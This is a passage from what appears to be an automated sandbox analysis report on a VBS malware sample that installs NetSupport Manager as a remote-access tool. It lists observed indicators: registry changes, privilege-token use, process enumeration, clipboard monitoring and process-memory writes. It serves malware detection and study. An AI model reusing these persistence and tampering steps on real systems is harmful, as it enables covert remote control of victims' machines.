Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	cscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	client32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates	cscript.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TELEPHONY\HANDOFFPRIORITIES\MEDIAMODES	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	cscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Telephony\HandoffPriorities	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	client32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	cscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher	cscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\powrprof.dll,-13 = "High performance"	client32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	client32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Telephony\HandoffPriorities\MediaModes	svchost.exe

Modifies registry class 64 IoCs

Processes:

MsiExec.exeMSI6995.tmpmsiexec.exewinst64.exeWScript.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\Control	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\movfile\shell\show\ = "&Show with NetSupport School"	MSI6995.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\N54eb181e	MSI6995.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\Version	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\SourceList\Media\1 = "DISK1;1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\IcoViewer.IconViewer	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\TypeLib\ = "{C58E5039-E78C-441D-AA62-383AD6F38FC8}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\Version\ = "1.0"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rpf\ = "NSReplayFile"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86386BBC7677FFC43B5E124188437620\NSM	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\PackageCode = "FDB71AF8AB6C3844AA562659D738D437"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ASFFile\shell	MSI6995.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ASFFile\shell\show\command\ = "\"C:\\Program Files (x86)\\NetSupport\\NetSupport Manager\\pcinssui.exe\" /ShowVideo \"%L\""	MSI6995.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\MiscStatus\ = "0"	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\VERSIONINDEPENDENTPROGID	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\ToolboxBitmap32	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86386BBC7677FFC43B5E124188437620\CommonFiles = "NSM"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\ProductIcon = "C:\\Windows\\Installer\\{CBB68368-7767-4CFF-B3E5-211488346702}\\ARPPRODUCTICON.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\IcoViewer.IconViewer.1\ = "IconViewer Class"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mpegfile\shell	MSI6995.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\Programmable\	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\Control	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\VersionIndependentProgID\ = "IcoViewer.IconViewer"	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{C58E5039-E78C-441D-AA62-383AD6F38FC8}\1.0\FLAGS	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\IcoViewer.IconViewer.1\ = "IconViewer Class"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{106389BC-E301-4C17-AA3A-C3B31829EDD0}\TypeLib\Version = "1.0"	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\Programmable	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell	MSI6995.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mpegfile	MSI6995.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\Insertable	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\ProgID	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mpegfile\shell\show\command	MSI6995.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\NSReplayFile\ = "NetSupport Manager Replay File"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86386BBC7677FFC43B5E124188437620\ClientIcon = "Client"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell\show	MSI6995.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\MiscStatus\1	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{106389BC-E301-4C17-AA3A-C3B31829EDD0}	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\InprocServer32\ThreadingModel = "Apartment"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86386BBC7677FFC43B5E124188437620\Client = "NSM"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\ProgID\ = "IcoViewer.IconViewer.1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile	MSI6995.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WMVFile	MSI6995.tmp
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\NSReplayFile\EditFlags = "0"	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\PROGID	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86386BBC7677FFC43B5E124188437620\InstalledByMSI = "CommonFiles"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\ = "IconViewer Class"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ASFFile\shell\show\command	MSI6995.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell\show\ = "&Show with NetSupport School"	MSI6995.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\NSReplayFile\Shell\ = "Play"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.rpf	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\TypeLib	MsiExec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AVIFile\shell\show\command	MSI6995.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mpegfile\shell\show\command\ = "\"C:\\Program Files (x86)\\NetSupport\\NetSupport Manager\\pcinssui.exe\" /ShowVideo \"%L\""	MSI6995.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71C5A887-11E0-4c5a-9B9B-D4A074555692}\InProcServer32	winst64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86386BBC7677FFC43B5E124188437620\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{81B6FD0E-25FF-4465-9918-2DFA7B9A4B46}\InprocServer32	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

client32.exe

pid	Process
624	client32.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exemsiexec.exeMSI6995.tmpclient32.execlient32.exe

pid	Process
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
3124	msiexec.exe
3124	msiexec.exe
4080	MSI6995.tmp
4080	MSI6995.tmp
4080	MSI6995.tmp
4080	MSI6995.tmp
4524	client32.exe
4524	client32.exe
624	client32.exe
624	client32.exe
624	client32.exe
624	client32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exemsiexec.exemsiexec.exe

description	pid	Process
Token: SeDebugPrivilege	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
Token: SeDebugPrivilege	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
Token: SeShutdownPrivilege	2700	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2700	msiexec.exe
Token: SeSecurityPrivilege	3124	msiexec.exe
Token: SeCreateTokenPrivilege	2700	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2700	msiexec.exe
Token: SeLockMemoryPrivilege	2700	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2700	msiexec.exe
Token: SeMachineAccountPrivilege	2700	msiexec.exe
Token: SeTcbPrivilege	2700	msiexec.exe
Token: SeSecurityPrivilege	2700	msiexec.exe
Token: SeTakeOwnershipPrivilege	2700	msiexec.exe
Token: SeLoadDriverPrivilege	2700	msiexec.exe
Token: SeSystemProfilePrivilege	2700	msiexec.exe
Token: SeSystemtimePrivilege	2700	msiexec.exe
Token: SeProfSingleProcessPrivilege	2700	msiexec.exe
Token: SeIncBasePriorityPrivilege	2700	msiexec.exe
Token: SeCreatePagefilePrivilege	2700	msiexec.exe
Token: SeCreatePermanentPrivilege	2700	msiexec.exe
Token: SeBackupPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	2700	msiexec.exe
Token: SeShutdownPrivilege	2700	msiexec.exe
Token: SeDebugPrivilege	2700	msiexec.exe
Token: SeAuditPrivilege	2700	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2700	msiexec.exe
Token: SeChangeNotifyPrivilege	2700	msiexec.exe
Token: SeRemoteShutdownPrivilege	2700	msiexec.exe
Token: SeUndockPrivilege	2700	msiexec.exe
Token: SeSyncAgentPrivilege	2700	msiexec.exe
Token: SeEnableDelegationPrivilege	2700	msiexec.exe
Token: SeManageVolumePrivilege	2700	msiexec.exe
Token: SeImpersonatePrivilege	2700	msiexec.exe
Token: SeCreateGlobalPrivilege	2700	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe
Token: SeRestorePrivilege	3124	msiexec.exe
Token: SeTakeOwnershipPrivilege	3124	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

client32.exe

pid	Process
624	client32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exe484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe

description	pid	Process	procid_target
PID 2008 wrote to memory of 4788	2008	WScript.exe	88
PID 2008 wrote to memory of 4788	2008	WScript.exe	88
PID 2008 wrote to memory of 4788	2008	WScript.exe	88
PID 4788 wrote to memory of 4620	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	96
PID 4788 wrote to memory of 4620	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	96
PID 4788 wrote to memory of 4620	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	96
PID 4788 wrote to memory of 1728	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	97
PID 4788 wrote to memory of 1728	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	97
PID 4788 wrote to memory of 1728	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	97
PID 4788 wrote to memory of 1728	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	97
PID 4788 wrote to memory of 1728	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	97
PID 4788 wrote to memory of 1728	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	97
PID 4788 wrote to memory of 1728	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	97
PID 4788 wrote to memory of 3844	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	98
PID 4788 wrote to memory of 3844	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	98
PID 4788 wrote to memory of 3844	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	98
PID 4788 wrote to memory of 3844	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	98
PID 4788 wrote to memory of 3844	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	98
PID 4788 wrote to memory of 3844	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	98
PID 4788 wrote to memory of 3844	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	98
PID 4788 wrote to memory of 3680	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	99
PID 4788 wrote to memory of 3680	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	99
PID 4788 wrote to memory of 3680	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	99
PID 4788 wrote to memory of 3680	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	99
PID 4788 wrote to memory of 3680	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	99
PID 4788 wrote to memory of 3680	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	99
